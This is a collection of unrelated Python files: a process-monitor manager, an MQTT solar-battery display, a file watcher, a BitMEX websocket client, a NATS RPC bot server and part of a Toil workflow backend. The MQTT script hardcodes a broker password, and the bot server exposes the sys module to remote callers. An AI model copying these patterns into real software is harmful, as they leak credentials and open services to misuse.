new_defaults = dict(config.items("procmonManager"))
for key in new_defaults:
if key in defaults:
defaults[key] = new_defaults[key]
parser = argparse.ArgumentParser(parents=[parser])
parser.set_defaults(**defaults)
parser.add_argument("--num_procmuxers", help="Number of procMuxers (listeners) to run", type=int)
parser.add_argument("--group", help="Management group of muxers", type=str)
parser.add_argument("--procMuxerPath", help="Path to ProcMuxer", type=str)
parser.add_argument("--reducer_path", help="Path to PostReducer", type=str)
parser.add_argument("--metadata_path", help="Path to CheckH5", type=str)
parser.add_argument("--base_pid_path", help="Directory for pidfiles", type=str)
parser.add_argument("--base_prefix", help="Local storage for data collection and processing", type=str)
parser.add_argument("--h5_path", help="Search path for h5 files", type=str)
parser.add_argument("--h5_prefix", help="Prefix for h5 file names (e.g., h5-path/<prefix>.YYYYMmddhHMMSS.h5)")
parser.add_argument("--target_scratch", help="Path for scratch products", type=str)
parser.add_argument("--email_list", help="Comma seperated list of people to email about procmonManager", type=split_comma)
parser.add_argument("--email_originator", help="'From' email address", type=str)
parser.add_argument("--use_jamo", help="Use Jamo (or Not)", type=is_True)
parser.add_argument("--jamo_url", help="URL for JAMO", type=str)
parser.add_argument("--jamo_token", help="Token for JAMO", type=str)
parser.add_argument("--jamo_user", help="username for jamo user", type=str)
parser.add_argument("--use_email", help="Use Email for warnings/errors (or Not)", type=is_True)
parser.add_argument("--daemonize", help="Daemonize the manager process", type=is_True)
parser.add_argument("--use_hpss", help="Use HPSS (or Not)", type=is_True)
parser.add_argument("--logfacility", help="syslog facility to use", type=str)
args, remaining_args = parser.parse_known_args(remaining_args)
return (args, remaining_args)
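# Example procmonManager.conf sketch (the section name and keys mirror the
# defaults above; the paths and addresses are illustrative only):
#
#   [procmonManager]
#   group = procman_prod
#   num_procmuxers = 2
#   base_prefix = /scratch/procmon
#   h5_path = /global/procmon/h5
#   use_email = True
#   email_originator = procmon@example.org
#   email_list = ops@example.org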
def daemonize():
pid = None
sid = None
if os.getppid() == 1:
# already daemonized
return
pid = os.fork()
if pid < 0:
sys.stderr.write("Failed to fork! Bailing out.\n");
sys.exit(1)
elif pid > 0:
# this is the parent, exit out
sys.exit(0)
os.umask(022)
os.chdir("/")
os.setsid()
pid = os.fork()
if pid > 0:
sys.exit(0)
    devnull = open(os.devnull, "r+")
for fd in (sys.stdin, sys.stdout, sys.stderr):
fd.close()
fd = devnull
if __name__ == "__main__":
(config,remaining_args) = read_configuration(sys.argv[1:])
print config
if config.use_jamo:
import sdm_curl
config.sdm = sdm_curl.Curl(config.jamo_url, appToken=config.jamo_token)
config.sdm_lock = threading.Lock()
if config.use_hpss:
config.hpss_lock = threading.Lock()
logFacility = syslog.LOG_LOCAL4
if config.logfacility is not None:
logFacility = config.logfacility.strip()
try:
logFacility = re.search('([\d\w]+)', logFacility).group(0)
logFacility = eval("syslog.LOG_%s" % logFacility)
except:
logFacility = syslog.LOG_LOCAL4
pass
syslog.openlog(logoption=syslog.LOG_PID, facility=logFacility)
if config.daemonize:
daemonize()
try:
main_loop(config)
except:
exc_type, exc_value, exc_traceback = sys.exc_info()
str_exc = traceback.format_exc()
str_tb = '\n'.join(traceback.format_tb(exc_traceback))
str_stack2 = '\n'.join(traceback.format_stack())
send_email(config, 'PROCMON FAILURE', '%s\n%s\n%s\n' % (str_exc, str_tb, str_stack2))
syslog.syslog(syslog.LOG_ERR, "PROCMONMANAGER FAILURE: stopped managing, %s" % str_exc)
|
pvDisplayPi0SimpleGUI.py
|
# pv display for Pi0 using python3 and PySimpleGUI
import time
from time import ctime
from datetime import datetime
import pytz
import json
import paho.mqtt.client as mqtt
import threading
Vin = ' 00.0'
Vout = ' 00.0'
Iin = ' 00.00'
Iout = ' 00.00'
ptz = pytz.timezone('America/Los_Angeles')
utc = pytz.timezone('UTC')
now = utc.localize(datetime.utcnow())
Time = str(now.astimezone(ptz))[:-13]
import PySimpleGUI as sg
sg.theme('DarkAmber') # Add a little color to your windows
sg.set_options(font=('Helvetica', 14))
# All the stuff inside your window. This is the PSG magic code compactor...
layout = [ [sg.Text(Time, key='-time-')],
[sg.Text('Battery In V: '), sg.Text(Vin, key='-Vin-'),
sg.Text(' I: '), sg.Text(Iin, key='-Iin-')],
[sg.Text('Battery Out V: '), sg.Text(Vout, key='-Vout-'),
sg.Text(' I: '), sg.Text(Iout, key='-Iout-')]
]
# Create the Window
window = sg.Window('PV Monitor', layout, no_titlebar=True)
def new_measurement(client, userdata, msg):
topic = msg.topic
measurement = json.loads(msg.payload)
#print(topic, measurement)
now = utc.localize(datetime.utcnow())
Time = str(now.astimezone(ptz))[:-13]
window['-time-'].update(Time)
if 'output' in topic:
if 'current' in topic:
Iout = " {0:5.2f}".format(measurement)
window['-Iout-'].update(Iout)
print(Iout)
else:
Vout = " {0:5.2f}".format(measurement)
window['-Vout-'].update(Vout)
elif 'input' in topic:
if 'current' in topic:
Iin = " {0:5.2f}".format(measurement)
window['-Iin-'].update(Iin)
else:
Vin = " {0:5.2f}".format(measurement)
window['-Vin-'].update(Vin)
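# Example (sketch): the callback above expects the subscribed topics below,
# each carrying a plain JSON number as payload, e.g.
#   pv/battery/output/voltage -> 13.2
#   pv/battery/input/current  -> 1.85
# (numeric values are illustrative only)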
# start mqtt client
def on_connect(client, userdata, flags, rc):
if rc == 0:
print("MQTT connect success")
else:
print(f"MQTT connect fail with code {rc}")
print("New MQT session being set up")
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = new_measurement
client.username_pw_set(username='mosq', password='1947nw')
client.connect("192.168.1.117", 1883, 60)
client.subscribe('pv/battery/output/voltage')
client.subscribe("pv/battery/output/current")
client.subscribe('pv/battery/input/voltage')
client.subscribe("pv/battery/input/current")
def PSGEvents():
while True:
event, values = window.read()
if event in (sg.WIN_CLOSED, 'Cancel'):
break
window.close()
def MQTT_Msgs():
while True:
client.loop()
time.sleep(1)
t1 = threading.Thread(target=PSGEvents)
t2 = threading.Thread(target=MQTT_Msgs)
t1.start()
t2.start()
|
fileobserver.py
|
import os
import glob
import time
import threading
import berrymq
class FileObserver(object):
def __init__(self, target_dir, id_name, interval=5):
self.id_name = id_name
self.target_dir = target_dir
self.interval = interval
self.fileinfo = self._get_fileinfo()
self.thread = threading.Thread(target=self._checkdir)
self.thread.setDaemon(True)
self.running = True
self.thread.start()
def stop(self):
self.running = False
def _checkdir(self):
while self.running:
time.sleep(self.interval)
new_info = self._get_fileinfo()
old_info = self.fileinfo
newfiles = set(new_info.keys())
oldfiles = set(old_info.keys())
for created_file in (newfiles - oldfiles):
berrymq.twitter("%s:created" % self.id_name, created_file)
for remove_file in (oldfiles - newfiles):
berrymq.twitter("%s:removed" % self.id_name, remove_file)
for remain_file in (oldfiles & newfiles):
if new_info[remain_file] != old_info[remain_file]:
berrymq.twitter("%s:modified" % self.id_name, remain_file)
self.fileinfo = new_info
def _get_fileinfo(self):
result = {}
for filename in glob.glob(self.target_dir):
result[filename] = os.path.getmtime(filename)
return result
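# --- minimal usage sketch (not part of the original module) ---
# "/tmp/watched/*" and the id name "watch" are placeholders; a berrymq
# subscriber registered elsewhere would receive the "watch:created",
# "watch:modified", and "watch:removed" messages twittered above.
if __name__ == "__main__":
    observer = FileObserver("/tmp/watched/*", "watch", interval=2)
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        observer.stop()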
|
bitmex_websocket.py
|
# coding: UTF-8
import hashlib
import hmac
import json
import os
import threading
import time
import traceback
import urllib
import websocket
from datetime import datetime, timedelta
from src import logger, to_data_frame, notify
from src.config import config as conf
def generate_nonce():
return int(round(time.time() * 1000))
def generate_signature(secret, verb, url, nonce, data):
"""Generate a request signature compatible with BitMEX."""
# Parse the url so we can remove the base and extract just the path.
parsedURL = urllib.parse.urlparse(url)
path = parsedURL.path
if parsedURL.query:
path = path + '?' + parsedURL.query
# print "Computing HMAC: %s" % verb + path + str(nonce) + data
message = (verb + path + str(nonce) + data).encode('utf-8')
signature = hmac.new(secret.encode('utf-8'), message, digestmod=hashlib.sha256).hexdigest()
return signature
class BitMexWs:
def __init__(self, account, pair, test=False):
"""
constructor
"""
# Account
self.account = account
# Pair
self.pair = pair
# condition that the bot runs on.
self.is_running = True
# testnet
self.testnet = test
# Notification destination listener
self.handlers = {}
if test:
domain = 'testnet.bitmex.com'
else:
domain = 'www.bitmex.com'
self.endpoint = 'wss://' + domain + '/realtime?subscribe=tradeBin1m:' + self.pair + ',' \
'tradeBin5m:' + self.pair + ',tradeBin1h:' + self.pair + ',tradeBin1d:' + self.pair + ',instrument:' + self.pair + ',' \
'margin,position,order,execution:' + self.pair + ',wallet,orderBookL2:' + self.pair #+ ',order:' + self.pair + ',execution:' + self.pair
self.ws = websocket.WebSocketApp(self.endpoint,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close,
header=self.__get_auth())
self.wst = threading.Thread(target=self.__start)
self.wst.daemon = True
self.wst.start()
def __get_auth(self):
"""
get auth info
"""
api_key = conf['bitmex_test_keys'][self.account]['API_KEY'] if self.testnet else conf['bitmex_keys'][self.account]['API_KEY']
api_secret = conf['bitmex_test_keys'][self.account]['SECRET_KEY'] if self.testnet else conf['bitmex_keys'][self.account]['SECRET_KEY']
        if len(api_key) > 0 and len(api_secret) > 0:
nonce = generate_nonce()
return [
"api-nonce: " + str(nonce),
"api-signature: " + generate_signature(api_secret, 'GET', '/realtime', nonce, ''),
"api-key:" + api_key
]
else:
logger.info("WebSocket is not authenticating.")
return []
def __start(self):
"""
start the websocket.
"""
while self.is_running:
self.ws.run_forever()
def __on_error(self, ws, message):
"""
On Error listener
:param ws:
:param message:
"""
logger.error(message)
logger.error(traceback.format_exc())
notify(f"Error occurred. {message}")
notify(traceback.format_exc())
def __on_message(self, ws, message):
"""
On Message listener
:param ws:
:param message:
:return:
"""
try:
obj = json.loads(message)
if 'table' in obj:
if len(obj['data']) <= 0:
return
table = obj['table']
action = obj['action']
data = obj['data']
if table.startswith("tradeBin"):
data[0]['timestamp'] = datetime.strptime(data[0]['timestamp'][:-5], '%Y-%m-%dT%H:%M:%S')
new_data = []
new_data.append(data[0])
#add placeholder tick so it resamples correctly
new_data.append({
"timestamp": data[0]['timestamp'] + timedelta(seconds=0.01),
"open": data[0]['close'],
"high": data[0]['close'],
"low" : data[0]['close'],
"close" : data[0]['close'],
"volume": 0
})
self.__emit(table, table[-2:], to_data_frame(new_data))
elif table.startswith("instrument"):
self.__emit(table, action, data[0])
elif table.startswith("margin"):
self.__emit(table, action, data[0])
elif table.startswith("position"):
self.__emit(table, action, data[0])
elif table == "order":
self.__emit(table, action, data[0])
elif table.startswith("execution"):
self.__emit(table, action, data[0])
elif table.startswith("wallet"):
self.__emit(table, action, data[0])
elif table.startswith("orderBookL2"):
self.__emit(table, action, data)
except Exception as e:
logger.error(e)
logger.error(traceback.format_exc())
def __emit(self, key, action, value):
"""
send data
"""
if key in self.handlers:
self.handlers[key](action, value)
def __on_close(self, ws):
"""
On Close Listener
:param ws:
"""
if 'close' in self.handlers:
self.handlers['close']()
if self.is_running:
logger.info("Websocket restart")
notify(f"Websocket restart")
self.ws = websocket.WebSocketApp(self.endpoint,
on_message=self.__on_message,
on_error=self.__on_error,
on_close=self.__on_close,
header=self.__get_auth())
self.wst = threading.Thread(target=self.__start)
self.wst.daemon = True
self.wst.start()
def on_close(self, func):
"""
on close fn
:param func:
"""
self.handlers['close'] = func
def bind(self, key, func):
"""
bind fn
:param key:
:param func:
"""
if key == '1m':
self.handlers['tradeBin1m'] = func
if key == '5m':
self.handlers['tradeBin5m'] = func
if key == '1h':
self.handlers['tradeBin1h'] = func
if key == '1d':
self.handlers['tradeBin1d'] = func
if key == 'instrument':
self.handlers['instrument'] = func
if key == 'margin':
self.handlers['margin'] = func
if key == 'position':
self.handlers['position'] = func
if key == 'order':
self.handlers['order'] = func
if key == 'execution':
self.handlers['execution'] = func
if key == 'wallet':
self.handlers['wallet'] = func
if key == 'orderBookL2':
self.handlers['orderBookL2'] = func
def close(self):
"""
close websocket
"""
self.is_running = False
self.ws.close()
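# --- minimal usage sketch (not part of the original module) ---
# "demo" is a placeholder account name; matching keys must exist in
# src.config under conf['bitmex_test_keys']['demo'] for testnet use.
if __name__ == "__main__":
    ws = BitMexWs(account="demo", pair="XBTUSD", test=True)
    ws.bind('1m', lambda action, df: logger.info("1m bin received"))
    try:
        time.sleep(60)
    finally:
        ws.close()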
|
botserver.py
|
# coding: utf-8
from __future__ import absolute_import, with_statement, print_function, unicode_literals
__version__ = '20.272.2127' # gzip_decode
#__version__ = '20.260.0040' # binary
#__version__ = '20.219.1837'
#__version__ = '20.211.1402'
#__version__ = '20.196.1406'
#__version__ = '20.104.0843'
#__version__ = '20.053.0012'
#__version__ = '20.022.0414'
#__version__ = '19.347.1606'
import sys
PY2 = sys.version_info[0] < 3
PY3 = sys.version_info[0] > 2
if __name__ == '__main__':
# env PYTHONIOENCODING="UTF-8"
if PY2:
reload(sys); sys.setdefaultencoding('UTF-8')
else:
if sys.stdout.encoding != 'UTF-8':
sys.stdout = open(sys.stdout.fileno(), mode='w', buffering=1, encoding='UTF-8')
#if sys.stderr.encoding != 'UTF-8':
# sys.stderr = open(sys.stderr.fileno(), mode='w', buffering=1, encoding='UTF-8')
sys.stderr.close()
sys.stderr = sys.stdout
import socket
try:
__hostname__ = sys.__hostname__
except:
__hostname__ = socket.gethostname().lower()
sys.__hostname__ = __hostname__
if PY2:
import ConfigParser as configparser
input = raw_input
from urllib import quote_plus, unquote_plus, urlencode
from urlparse import urlparse
BrokenPipeError = socket.error
ConnectionRefusedError = socket.error
from xmlrpclib import gzip_decode, gzip_encode
else:
import configparser
raw_input = input
from urllib.parse import quote_plus, unquote_plus, urlencode, urlparse
from xmlrpc.client import gzip_decode, gzip_encode
import os, time, json #, pickle
from threading import Thread, RLock
import pydoc
import threading, types, traceback
import uuid, hashlib, base64
import random
import decimal, datetime
class ExtJSONEncoder(json.JSONEncoder):
def default(self, obj):
#if isinstance(obj, Binary):
# return {'__binary__': obj.encode()}
if isinstance(obj, decimal.Decimal):
return float(obj)
elif isinstance(obj, datetime.datetime):
return str(obj)
elif isinstance(obj, datetime.date):
return str(obj)
elif isinstance(obj, set):
return list(obj)
return json.JSONEncoder.default(self, obj)
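# Example (sketch): ExtJSONEncoder lets json.dumps() accept values the stock
# encoder rejects, e.g.
#   json.dumps({'qty': decimal.Decimal('1.25'), 'tags': {'a'}}, cls=ExtJSONEncoder)
# serializes the Decimal as a float and the set as a list; datetime/date
# values become their str() form.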
try:
from types import SimpleNamespace
except ImportError:
class SimpleNamespace (object):
def __init__ (self, **kwargs):
self.__dict__.update(kwargs)
def __repr__ (self):
keys = sorted(self.__dict__)
items = ("{}={!r}".format(k, self.__dict__[k]) for k in keys)
return "{}({})".format(type(self).__name__, ", ".join(items))
def __eq__ (self, other):
return self.__dict__ == other.__dict__
if PY2:
Binary = lambda data: {'__binary__': base64.b64encode(data)}
else:
Binary = lambda data: {'__binary__': base64.b64encode(data).decode('ascii')}
_binary = lambda obj: SimpleNamespace(data=base64.b64decode(obj.pop('__binary__'))) if '__binary__' in obj else obj
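# Example (sketch, Python 3): Binary()/_binary round-trip raw bytes via JSON:
#   payload = json.dumps(Binary(b'\x00\x01'))
#   json.loads(payload, object_hook=_binary).data == b'\x00\x01'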
try:
_ns
except:
_ns = SimpleNamespace(request_number=0, request_count=0)
class BOTServer(object):
def __init__(self, name, address=None, authkey=None, max_requests=0):
self._max_requests = max_requests
self._info = {}
self._sock = None
self._w_lck = RLock()
self._fg_serve_forever = False
self._functions = {}
self._botname = name
self.bot_id = 'bot.%s' % urn5(name)
if address is None:
address = ('127.0.0.1', 4222)
self._address = address
self._authkey = authkey
self.register_function(self._system_list_methods, 'system.listMethods')
self.register_function(self._system_method_help, 'system.methodHelp')
self.register_function(self._http, '.http')
@property
def request_number(self):
return _ns.request_number
@property
def request_count(self):
return _ns.request_count
def __repr__(self):
return (
"<%s for %s %s>" % (self.__class__.__name__, self._botname, self._address)
)
__str__ = __repr__
def _system_list_methods(self, func_name=None):
#print(1111, func_name)
if func_name:
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
func = getattr(func, fn) if func else self._functions[fn]
if func:
return list(sorted('%s.' % k if isinstance(getattr(func, k), sys.__class__) or hasattr(getattr(func, k), '_system_list_methods') else k for k in dir(func) if '_' != k[:1]))
else:
return RuntimeError('%s not found' % func_name)
else:
return list(sorted('%s.' % k if isinstance(v, sys.__class__) or hasattr(v, '_system_list_methods') else k for k, v in self._functions.items()))
def _system_method_help(self, func_name):
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
func = getattr(func, fn) if func else self._functions[fn]
if func:
return pydoc.getdoc(func)
else:
return ''
def _http(self, head, body):
        return '404 Not Found', [], b''
#status = '200 OK'
#headers = [('Content-Type', 'text/plain; charset=utf-8'),]
#return status, headers, ('<%s>' % __hostname__).encode()
def register_function(self, func, name=None):
if name:
self._functions[name] = func
else:
self._functions[func.__name__] = func
def register_instance(self, instance, allow_dotted_names=False):
for name in dir(instance):
if '_' == name[:1]:
continue
func = getattr(instance, name)
if allow_dotted_names:
self._functions[name] = func
else:
if callable(func):
self._functions[name] = func
def close(self):
self._fg_serve_forever = False
self._unsub()
self._close()
def _close(self):
try:
if self._sock:
with self._w_lck:
self._sock.close()
except:
#log(None)
pass
def _unsub(self):
try:
if self._sock:
with self._w_lck:
self._sock.sendall(b'UNSUB 2\r\nUNSUB 3\r\n')
except:
#log(None)
pass
def serve_forever(self):
self.close()
#try:
# self._serve_forever()
#finally:
# self.close()
_defer = []
defer = _defer.append
_err_old = ''
_fg_loop = True
while _fg_loop:
_fg_loop = False
try:
self._serve_forever(defer)
except (ConnectionRefusedError, RuntimeError) as e:
#traceback.print_exc()
_fg_loop = True # self._fg_serve_forever
_err = str(e)
if _err_old != _err:
_err_old = _err
log(_err, kind='error1')
try:
time.sleep(1 + random.random())
except:
_fg_loop = False
pass
#log('stop', begin='\r')
except Exception as e:
_fg_loop = self._fg_serve_forever
#traceback.print_exc()
_err = str(e)
if _err_old != _err:
_err_old = _err
log(_err, kind='error2')
#log(None)
finally:
while _defer:
func = _defer.pop(-1)
try:
func()
except:
#log(None)
pass
#print(2222)
def notify(self, subject, data=None):
if not self._fg_serve_forever:
return
if data is None:
data = ('PUB %s 0\r\n\r\n' % subject).encode('utf8')
else:
data = json.dumps(data, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
#data = pickle.dumps(data, protocol=2)
if len(data) > 1400:
data = gzip_encode(data)
data = ('PUB %s %s\r\n' % (subject, len(data))).encode('utf8') + data + b'\r\n'
#print('data:', data)
with self._w_lck:
try:
self._sock.sendall(data)
return True
except:
traceback.print_exc()
def _send(self, inbox_id, obj, fg_http=False):
if fg_http:
#if len(obj[2]) > 1400 and b'\x1f\x8b\x08\x00' != obj[2][:4]:
# data = b''.join([b'HTTP', json.dumps(obj[:2], ensure_ascii=False, separators=(',', ':')).encode('utf8'), b'\r\n', gzip_encode(obj[2])])
#else:
data = b''.join([b'HTTP', json.dumps(obj[:2], ensure_ascii=False, separators=(',', ':')).encode('utf8'), b'\r\n', obj[2]])
else:
data = json.dumps(obj, ensure_ascii=False, cls=ExtJSONEncoder).encode('utf8')
if len(data) > 1400:
data = gzip_encode(data)
data = b'PUB %s %s\r\n%s\r\n' % (inbox_id.encode(), ('%s' % len(data)).encode(), data)
with self._w_lck:
#log(repr(data), 'send2')
self._sock.sendall(data)
return len(data)
def _serve_forever(self, defer):
#while True:
# client_c = self.accept()
# t = Thread(target=self.handle_client, args=(client_c,))
# t.daemon = True
# t.start()
#print('00000', self._sock)
sock = socket.create_connection(self._address, 2)
self._sock = sock
defer(sock.close)
defer(lambda: sock.sendall(b'UNSUB 2\r\nUNSUB 3\r\n'))
def w(data):
with self._w_lck:
#log(repr(data), 'send1')
sock.sendall(data)
bot_name = self._botname
bot_id = self.bot_id # 'bot.%s' % urn5(bot_name)
"""
w(('CONNECT {"name":"%s","verbose":false,"pedantic":false}\r\n' % bot_name).encode('utf8'))
data = 'SUB bot.info 2\r\n'
#log(data, 'NATS')
w(data.encode('utf8'))
#data = 'SUB %s 3\r\n' % (bot_id,)
data = 'SUB %s %s 3\r\n' % (bot_id, bot_id)
#log(data, 'NATS')
w(data.encode('utf8'))
"""
w(('CONNECT {"name":"%s","verbose":false,"pedantic":false}\r\n' % bot_name).encode('utf8') + ('SUB bot.info 2\r\nSUB %s %s 3\r\n' % (bot_id, bot_id)).encode('utf8'))
self._fg_serve_forever = True
c = 0
while self._fg_serve_forever:
cmd = ''
data = ''
try:
data = recvline(sock)
cmd, data = data[:3], data[3:]
except socket.timeout:
c += 1
#log('%s) timeout' % c, 'socket0')
if c > 3:
c = 0
#log('pong) timeout', 'socket0')
w(b'PONG\r\n')
continue
finally:
if self._max_requests < 0 and _ns.request_count < 1:
self.close()
raise ValueError('MAX REQUESTS %s' % _ns.request_number) # KeyboardInterrupt
#os._exit(0)
if not cmd:
raise RuntimeError('[ Socket ] cmd is empty')
if not data:
raise RuntimeError('[ Socket ] data is empty')
#log('>%s<' % data, '<%s>' % cmd)
if 'MSG' == cmd:
#MSG <subject> <sid> [reply-to] <#bytes>\r\n[payload]\r\n
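                # Example (illustrative values): a server line such as
                #   MSG bot.abc123 3 _INBOX.reply42 11
                # is parsed below into subj='bot.abc123', sid='3',
                # reply_id='_INBOX.reply42', size=11, and is followed by an
                # 11-byte payload plus a trailing CRLF.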
data = data.split()
#print('data:', data)
if 3 == len(data):
subj, sid, reply_id, size = data[0], data[1], '', int(data[2])
else:
subj, sid, reply_id, size = data[0], data[1], data[2], int(data[3])
payload = recvall(sock, size) if size > 0 else b''
sock.recv(1)
sock.recv(1)
#log(cmd, 'nats')
#print(cmd, subj, sid, reply_id, repr(payload)[:32], '...', len(payload), size)
if sid == '2' and reply_id and not payload:
log(subj, 'sid 2 subj:')
#sys.stdout.flush()
#MSG bot.info 2 cli.a1f9d72027a9455496efc3947fc4ea8c b''
#w(('PUB %s %s %s\r\n%s\r\n' % (reply_id, bot_id, len(bot_name), bot_name)).encode('utf8'))
elif sid == '3' and reply_id:
data = ('PUB %s 0\r\n\r\n' % reply_id).encode('utf8') # ask
#print('data:', data)
w(data)
"""
with self._w_lck:
try:
self._sock.sendall(data)
except:
traceback.print_exc()
"""
_ns.request_number += 1
_t = Thread(target=self.handle_client, args=(reply_id, payload))
_t.daemon = True
_t.name += '-msg'
_t.start()
#sys.stdout.flush()
elif 'PIN' == cmd:
w(b'PONG\r\n')
elif 'PON' == cmd:
pass
elif 'INF' == cmd:
self._info = json.loads(data[2:])
#self._info = json.loads(data[5:])
#cid = self._info['client_id']
#w(('SUB bot.info 2\r\nSUB %s %s 3\r\n' % (bot_id, bot_id)).encode('utf8'))
elif cmd in ('+OK', '-ER'):
pass
def handle_client(self, reply_id, payload):
try:
_ns.request_count += 1
return self._handle_client(reply_id, payload)
finally:
_ns.request_count -= 1
if self._max_requests > 0:
with self._w_lck:
if self._max_requests > 0 and _ns.request_number >= self._max_requests:
self._unsub()
self._max_requests = -1
def _handle_client(self, reply_id, payload):
#threading.current_thread().conn = client_c
_fg = True
while _fg:
fg_http = False
_fg = False
try:
if b'HTTP' == payload[:4]:
head, payload = payload.split(b'\r\n', 1)
head = json.loads(head[4:])
#if b'\x1f\x8b\x08\x00' == payload[:4]:
# payload = gzip_decode(payload, -1)
#print(head)
#print(payload)
func_name = '.http'
args = (head, payload)
kwargs = {}
fg_http = True
else:
if b'\x1f\x8b\x08\x00' == payload[:4]:
if PY2:
payload = gzip_decode(payload)
else:
payload = gzip_decode(payload, -1)
payload = json.loads(payload, object_hook=_binary)
func_name = payload.get('method', '')
args = payload.pop('args', [])
kwargs = payload.pop('kwargs', {})
#except EOFError:
# #print('close:', client_c)
# #sys.stdout.flush()
# break
except Exception as e:
print('recv:', type(e), str(e))
traceback.print_exc()
sys.stdout.flush()
break
#print(111)
try:
func = None
if func_name in self._functions:
func = self._functions[func_name]
else:
for fn in func_name.split('.'):
func = getattr(func, fn) if func else self._functions[fn]
#print(222, func)
if func:
if callable(func):
r = func(*args, **kwargs)
"""
if isinstance(r, types.GeneratorType):
self._send(reply_id, {'result': list}) # types.ListType)
#client_c.send('types.GeneratorType')
for v in r:
self._send(reply_id, {'result': v})
self._send(reply_id, {'result': StopIteration})
continue
"""
else:
r = func
if fg_http:
_len = self._send(reply_id, r, fg_http=True)
else:
_len = self._send(reply_id, {'result': r})
else:
r = RuntimeError('%s not found' % func_name)
_len = self._send(reply_id, {'error': str(r)})
#print('send >>', _len)
except Exception as e:
try:
self._send(reply_id, {'error': str(e)})
except IOError:
break
except Exception as e:
print('send:', type(e), str(e))
sys.stdout.flush()
break
def recvline(s):
data = []
while True:
ch2 = s.recv(2)
if ch2:
data.append(ch2)
if ch2[-1:] == b'\r':
data.append(s.recv(1))
break
elif ch2[-1:] == b'\n':
break
else:
break
return b''.join(data).decode()
def recvall(r, n):
data = []
c = 0
while c < n:
packet = r.recv(n - c)
if not packet:
break
c += len(packet)
data.append(packet)
return b''.join(data)
"""
def readall(r, n):
data = []
c = 0
while c < n:
#log(c, n)
packet = r.read(n - c)
if not packet:
return b''
c += len(packet)
data.append(packet)
return b''.join(data)
"""
def urn1(name):
h1 = hashlib.sha1(uuid.NAMESPACE_DNS.bytes)
h1.update(name.encode())
return base64.b32encode(h1.digest()).decode('utf8')
#return 'urn:sha1:%s' % base64.b32encode(h1.digest()).decode('utf8')
def urn5(name):
h5 = hashlib.md5(uuid.NAMESPACE_DNS.bytes)
h5.update(name.encode())
return base64.b16encode(h5.digest()).decode('utf8').lower()
#return 'urn:md5:%s' % base64.b16encode(h5.digest()).decode('utf8').lower()
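# Example (sketch): urn5() yields a deterministic 32-character lowercase hex
# md5 id for a given name; BOTServer prefixes it with 'bot.' to build the
# NATS subject it subscribes to (see self.bot_id above).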
class BOTApi(object):
def _system_list_methods(self, func_name=None):
return list(sorted(k for k in dir(self) if '_' != k[:1]))
def add2(self, x, y):
""" help add2 """
return x + y
def sub2(self, x, y):
return x - y
#def ping(self, name, port):
# client_c = threading.current_thread().conn
# s = socket.fromfd(client_c.fileno(), socket.AF_INET, socket.SOCK_STREAM)
# #print(s, dir(s), s.getpeername()[0], s.getsockname(), s.gettimeout())
# client_ip = s.getpeername()[0]
# s.close()
# return client_ip, port
_ts = "%Y-%m-%d %H:%M:%S"
__appname__ = 'bot'
__profile__ = 'test'
__index__ = os.getpid()
def log(msg, kind='info', begin='', end='\n'):
global _ts, __hostname__, __appname__, __profile__, __version__, __index__
try:
try: ts = time.strftime(_ts)
except: ts = time.strftime(_ts)
if msg is None:
data = ''.join(
('%s %s %s.%s %s %s:%s %s\n' % (ts, __hostname__, __appname__,__profile__,__version__,__index__,'traceback', msg)
if i else '%s %s %s.%s %s %s:%s\n' % (ts, __hostname__, __appname__,__profile__,__version__,__index__,msg)
) for i, msg in enumerate(traceback.format_exc().splitlines())
)
else:
data = '%s%s %s %s.%s %s %s:%s %s%s' % (begin,ts, __hostname__, __appname__,__profile__,__version__,__index__,kind, msg,end)
sys.stdout.write(data)
sys.stdout.flush()
except:
pass
#traceback.print_exc()
try:
if sys.log:
log = sys.log
except:
pass
################################
def run_api(name, object_function=None, func_name=None):
# Create and run the server
#serv = BOTServer(name)
#serv = BOTServer(name, ('nats0.tgbot.ms', 4222))
serv = BOTServer(name, ('127.0.0.1', 4222))
#serv = BOTServer(name, ('nats1.tgbot.ms', 4222))
# api = BOTApi()
# serv.register_function(api, 'api')
print(serv)
if object_function:
serv.register_function(object_function, func_name)
#o = dict(k1='v1', k2='v2', k3='v3')
#serv.register_instance(o)
#from pprint import pprint
#pprint(serv._functions)
serv.register_function(sys)
serv.register_function(time)
serv.register_function(time.sleep)
_th = Thread(target=serv.serve_forever)
_th.daemon = True
_th.start()
try:
#serv.serve_forever()
while True:
s = input('>> ').strip()
if not s:
print(serv.notify('SUBJ.' + serv.bot_id, {1:2, 'k2': 'v4'}))
else:
raise KeyboardInterrupt
except (KeyboardInterrupt, SystemExit) as e:
        print('stopped server')
sys.stdout.flush()
if __name__ == '__main__':
try:
s = sys.argv[1]
except:
s = ''
run_api('mybot.conf')
#run_api('price-bot.test' + s)
|
toil_wes.py
|
import json
import os
import subprocess
import time
import logging
import uuid
import shutil
from multiprocessing import Process
from wes_service.util import WESBackend
logging.basicConfig(level=logging.INFO)
class ToilWorkflow:
def __init__(self, run_id):
"""
Represents a toil workflow.
:param str run_id: A uuid string. Used to name the folder that contains
all of the files containing this particular workflow instance's information.
"""
super().__init__()
self.run_id = run_id
self.workdir = os.path.join(os.getcwd(), "workflows", self.run_id)
self.outdir = os.path.join(self.workdir, "outdir")
if not os.path.exists(self.outdir):
os.makedirs(self.outdir)
self.outfile = os.path.join(self.workdir, "stdout")
self.errfile = os.path.join(self.workdir, "stderr")
self.starttime = os.path.join(self.workdir, "starttime")
self.endtime = os.path.join(self.workdir, "endtime")
self.pidfile = os.path.join(self.workdir, "pid")
self.statcompletefile = os.path.join(self.workdir, "status_completed")
self.staterrorfile = os.path.join(self.workdir, "status_error")
self.cmdfile = os.path.join(self.workdir, "cmd")
self.jobstorefile = os.path.join(self.workdir, "jobstore")
self.request_json = os.path.join(self.workdir, "request.json")
self.input_json = os.path.join(self.workdir, "wes_input.json")
self.jobstore_default = "file:" + os.path.join(self.workdir, "toiljobstore")
self.jobstore = None
def sort_toil_options(self, extra):
# determine jobstore and set a new default if the user did not set one
cloud = False
        # iterate over a copy so extra.remove() below cannot skip entries
        for e in list(extra):
if e.startswith("--jobStore="):
self.jobstore = e[11:]
if self.jobstore.startswith(("aws", "google", "azure")):
cloud = True
